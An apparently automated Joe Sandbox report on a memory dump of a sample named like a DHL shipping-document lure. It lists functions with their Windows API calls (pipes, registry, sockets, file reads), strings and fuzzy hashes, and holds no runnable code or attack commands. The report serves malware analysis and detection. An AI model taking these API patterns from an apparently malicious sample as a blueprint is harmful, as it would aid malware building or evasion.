Instruction Fuzzy Hash: 1C21DE35619209AF9B10AFA8DC8CDEA73FCEB597207218025B904CB2A1D670DC81DB74

Function 002204D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 002204F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0022052E

Strings

nul, xrefs: 00220567

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: d59ec798a991ac41f0d407591383ad02d4a4df3ea86f69793be7f939577d6d0d
Instruction ID: bf1be9295e906926bc4e6a262f56d078998c8b848f71db2b91c7c3f467b4e7e7
Opcode Fuzzy Hash: d59ec798a991ac41f0d407591383ad02d4a4df3ea86f69793be7f939577d6d0d
Instruction Fuzzy Hash: C221A574510316BBCB209FA9EC84A9977F4BF45720F604A18F8A1D61E1D7B09970CF60

Function 002205A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 002205C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00220601

Strings

nul, xrefs: 00220639

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 1df0a5601f20abcf592c033f28e5bb27179f416b907344421ff7c0c3669f72e2
Instruction ID: 1b7d4830f0f277617f1313a4cb7e9e9de68af20fab8ab10d496b3d7cb5f48ed8
Opcode Fuzzy Hash: 1df0a5601f20abcf592c033f28e5bb27179f416b907344421ff7c0c3669f72e2
Instruction Fuzzy Hash: 41216F75510316BFDB209FA9EC84AA577E8BF55720F200619FCA1D71E5D7B09970CB10

Function 002440AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001B600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001B604C
Part of subcall function 001B600E: GetStockObject.GDI32(00000011), ref: 001B6060
Part of subcall function 001B600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 001B606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00244112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0024411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0024412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00244139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00244145

Strings

Msctls_Progress32, xrefs: 002440E3

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: c1f3ea80f36392c0f4573e39babca0699711a6cd6e670c271ad77f0dca99d245
Instruction ID: 238781490b7a00a764b94a63951ea47062a41db4e3bdc219d0846a23c3ceface
Opcode Fuzzy Hash: c1f3ea80f36392c0f4573e39babca0699711a6cd6e670c271ad77f0dca99d245
Instruction Fuzzy Hash: B71190B215021ABEEF119E64CC86EE77F5DEF19798F014111BA18A6090C7729C219BA4

Function 001ED7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001ED7A3: _free.LIBCMT ref: 001ED7CC

_free.LIBCMT ref: 001ED82D

Part of subcall function 001E29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001ED7D1,00000000,00000000,00000000,00000000,?,001ED7F8,00000000,00000007,00000000,?,001EDBF5,00000000), ref: 001E29DE
Part of subcall function 001E29C8: GetLastError.KERNEL32(00000000,?,001ED7D1,00000000,00000000,00000000,00000000,?,001ED7F8,00000000,00000007,00000000,?,001EDBF5,00000000,00000000), ref: 001E29F0

_free.LIBCMT ref: 001ED838
_free.LIBCMT ref: 001ED843
_free.LIBCMT ref: 001ED897
_free.LIBCMT ref: 001ED8A2
_free.LIBCMT ref: 001ED8AD
_free.LIBCMT ref: 001ED8B8

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: 8ed27231ec7e722a7d8479e1cad3e185b7473500f94eba374ce8d7ecf1046ff6
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 32113A71940F98AAD621BFF2DC47FCF7BDCAF20704F400825F699A6092DB79B5058662

Function 0021DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0021DA74
LoadStringW.USER32(00000000), ref: 0021DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0021DA91
LoadStringW.USER32(00000000), ref: 0021DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0021DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0021DAB9

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: f13486d62b20d3058802a162c67ee09b5e9c1209636c457bf4a0295ea720dfa5
Instruction ID: 04add701728d99dc717a2f4745a73d20eddac346c2162ca584bdf3b348da78ce
Opcode Fuzzy Hash: f13486d62b20d3058802a162c67ee09b5e9c1209636c457bf4a0295ea720dfa5
Instruction Fuzzy Hash: B60186F6910208BFE751DBA8ED8DEE773ACEB09305F504492B74AE2041EA749E844F74

Function 0022096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00EEEB90,00EEEB90), ref: 0022097B
EnterCriticalSection.KERNEL32(00EEEB70,00000000), ref: 0022098D
TerminateThread.KERNEL32(454D414E,000001F6), ref: 0022099B
WaitForSingleObject.KERNEL32(454D414E,000003E8), ref: 002209A9
CloseHandle.KERNEL32(454D414E), ref: 002209B8
InterlockedExchange.KERNEL32(00EEEB90,000001F6), ref: 002209C8
LeaveCriticalSection.KERNEL32(00EEEB70), ref: 002209CF

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 6ef8562eb0f62e52231b299a1c43ced6be3003c2a3562e1f011dde1366904f50
Instruction ID: f18ab515642c7f39472a7638cae8301935ad8a4fd8ddeb35ee5c57b18d049d09
Opcode Fuzzy Hash: 6ef8562eb0f62e52231b299a1c43ced6be3003c2a3562e1f011dde1366904f50
Instruction Fuzzy Hash: A9F0CD35543912BBD7916F98FE8DAD67A25BF06B02F501025F502508A1C7B5A475CF90

Function 001B5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 001B5D30
GetWindowRect.USER32(?,?), ref: 001B5D71
ScreenToClient.USER32(?,?), ref: 001B5D99
GetClientRect.USER32(?,?), ref: 001B5ED7
GetWindowRect.USER32(?,?), ref: 001B5EF8

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 0bbdd65f2a0d86624e8cded45422cfc37afbcabacd9d72f92920520b8f64d30d
Instruction ID: fb6d6125648dcae5552f86f314635f4aa7ebffe2da73a399a8c538b850c24bba
Opcode Fuzzy Hash: 0bbdd65f2a0d86624e8cded45422cfc37afbcabacd9d72f92920520b8f64d30d
Instruction Fuzzy Hash: B5B16838A00A4ADBDB14CFA9C4847FAB7F2FF48310F14851AE9A9D7250DB34EA51DB54

Function 001E01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 001E00BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001E00D6
__allrem.LIBCMT ref: 001E00ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001E010B
__allrem.LIBCMT ref: 001E0122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001E0140

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
Instruction ID: cfd73dd3c279bf2736ba7d221d6cc9981b9900ec98d3f5189425b45099d4514f
Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
Instruction Fuzzy Hash: 27812872A00B46ABE7259F6ACC81B6F73E8AF55364F24413EF511DA381E7B0DA418790

Function 00231D10 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00233149: select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00233195

__WSAFDIsSet.WSOCK32(00000000,?), ref: 00231DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00231DE1
WSAGetLastError.WSOCK32 ref: 00231DF2
inet_ntoa.WSOCK32(?), ref: 00231E8C
htons.WSOCK32(?), ref: 00231EDB
_strlen.LIBCMT ref: 00231F35

Part of subcall function 002139E8: _strlen.LIBCMT ref: 002139F2

Part of subcall function 001B6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,001CCF58,?,?,?), ref: 001B6DBA
Part of subcall function 001B6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,001CCF58,?,?,?), ref: 001B6DED

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
String ID:
API String ID: 1923757996-0
Opcode ID: 8fbf51f0830c900df4258f09aade70fcd24535331b169c4780af27be7e1e50d6
Instruction ID: c17254bb8412e57dfd9fc77412ed653c7d5625d7b59f1281246365d9be3f2875
Opcode Fuzzy Hash: 8fbf51f0830c900df4258f09aade70fcd24535331b169c4780af27be7e1e50d6
Instruction Fuzzy Hash: D8A10370214301AFC324DF24C885F6A7BE5AFA5318F54894CF4565B2E2CB71ED52CB92

Function 001E61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001D82D9,001D82D9,?,?,?,001E644F,00000001,00000001,8BE85006), ref: 001E6258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,001E644F,00000001,00000001,8BE85006,?,?,?), ref: 001E62DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001E63D8
__freea.LIBCMT ref: 001E63E5

Part of subcall function 001E3820: RtlAllocateHeap.NTDLL(00000000,?,00281444,?,001CFDF5,?,?,001BA976,00000010,00281440,001B13FC,?,001B13C6,?,001B1129), ref: 001E3852

__freea.LIBCMT ref: 001E63EE
__freea.LIBCMT ref: 001E6413

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: bc991707ccfd5acd0441eeecf6553b5d2fe286e87e92f4cd6d9b4790f45bf19d
Instruction ID: 4d04fcf423613cc46e0d20c8fe8f0e3666d4edb44c2bc43367ca2990d577179d
Opcode Fuzzy Hash: bc991707ccfd5acd0441eeecf6553b5d2fe286e87e92f4cd6d9b4790f45bf19d
Instruction Fuzzy Hash: 93510472A00A96ABDB258F66CC81EBF77A9EF64790F654229FD09D7180DB34DC40C660

Function 0023BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001B9CB3: _wcslen.LIBCMT ref: 001B9CBD

Part of subcall function 0023C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0023B6AE,?,?), ref: 0023C9B5
Part of subcall function 0023C998: _wcslen.LIBCMT ref: 0023C9F1
Part of subcall function 0023C998: _wcslen.LIBCMT ref: 0023CA68
Part of subcall function 0023C998: _wcslen.LIBCMT ref: 0023CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0023BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0023BD25
RegCloseKey.ADVAPI32(00000000), ref: 0023BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0023BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0023BDF3
RegCloseKey.ADVAPI32(?), ref: 0023BDFF

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: eb957efd00cd808737356f933fd4352c5b0b1c1b9a1ce37738bb8291a6375efe
Instruction ID: 660a798fae54719a747e4bde14847a565c96553accfb87f159fad1233c80567c
Opcode Fuzzy Hash: eb957efd00cd808737356f933fd4352c5b0b1c1b9a1ce37738bb8291a6375efe
Instruction Fuzzy Hash: 4F81D070218241EFC715DF24C885E6ABBE5FF84308F14895DF55A8B2A2CB32ED15CB92

Function 0020F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0020F7B9
SysAllocString.OLEAUT32(00000001), ref: 0020F860
VariantCopy.OLEAUT32(0020FA64,00000000), ref: 0020F889
VariantClear.OLEAUT32(0020FA64), ref: 0020F8AD
VariantCopy.OLEAUT32(0020FA64,00000000), ref: 0020F8B1
VariantClear.OLEAUT32(?), ref: 0020F8BB

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 634b7106924a35d2b9840f0a2623dbdea6c13926bea08367acfecf72352e9156
Instruction ID: 6b435c108157580d1568ffafaafd772b033988e100d1382c156709f7268791a0
Opcode Fuzzy Hash: 634b7106924a35d2b9840f0a2623dbdea6c13926bea08367acfecf72352e9156
Instruction Fuzzy Hash: C0512A31560304BACFB0AF65D985B69B3A4EF55310F20946BE902DF6D3D7B08C50CB96

Function 0022910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 001B7620: _wcslen.LIBCMT ref: 001B7625

Part of subcall function 001B6B57: _wcslen.LIBCMT ref: 001B6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 002294E5
_wcslen.LIBCMT ref: 00229506
_wcslen.LIBCMT ref: 0022952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00229585

Strings

X, xrefs: 00229412

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 266d5be17a2af07b2cc69a16a91ccb88b92e1d3e47ba2a6422564fd51e0252b4
Instruction ID: 51f9f9e131b289c74845620916c33f0bfd0402b9d3fbf7d73be09d9fe3fc495c
Opcode Fuzzy Hash: 266d5be17a2af07b2cc69a16a91ccb88b92e1d3e47ba2a6422564fd51e0252b4
Instruction Fuzzy Hash: 1DE1E330618311DFD724EF64D881BAAB7E4BF94310F14896DF8899B2A2DB30DD55CB92

Function 001C920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 001C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001C9BB2

BeginPaint.USER32(?,?,?), ref: 001C9241
GetWindowRect.USER32(?,?), ref: 001C92A5
ScreenToClient.USER32(?,?), ref: 001C92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001C92D3
EndPaint.USER32(?,?,?,?,?), ref: 001C9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002071EA

Part of subcall function 001C9339: BeginPath.GDI32(00000000), ref: 001C9357

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 6fd8ca302b5f76e0cf68c8a545080d247b26c6884b315e3243534e3c3a964af4
Instruction ID: 233d802e3ee455021b5ed2a73bf351360e73edbb5babab67895bc1463428055f
Opcode Fuzzy Hash: 6fd8ca302b5f76e0cf68c8a545080d247b26c6884b315e3243534e3c3a964af4
Instruction Fuzzy Hash: B8419D74105341AFD710DF24DC88FAA7BB8FF66720F140669F998862E2C7319855DB61

Function 002207EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0022080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00220847
EnterCriticalSection.KERNEL32(?), ref: 00220863
LeaveCriticalSection.KERNEL32(?), ref: 002208DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 002208F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00220921

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 27fc6605f7b12851fd193a0e94f0775bcff6cb744c37eed40e724ed240f83988
Instruction ID: ae69d37ad4f24c2f5ad246b4be7014148fc6ea06178f24fec61e93f73f1253fe
Opcode Fuzzy Hash: 27fc6605f7b12851fd193a0e94f0775bcff6cb744c37eed40e724ed240f83988
Instruction Fuzzy Hash: 7D416A71900205EFDF14EF94EC85AAA77B9FF14700F1440A9ED049A297DB70DE61DBA4

Function 00214C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00214C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00214CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00214CEA
_wcslen.LIBCMT ref: 00214D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00214D10
_wcsstr.LIBVCRUNTIME ref: 00214D1A

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
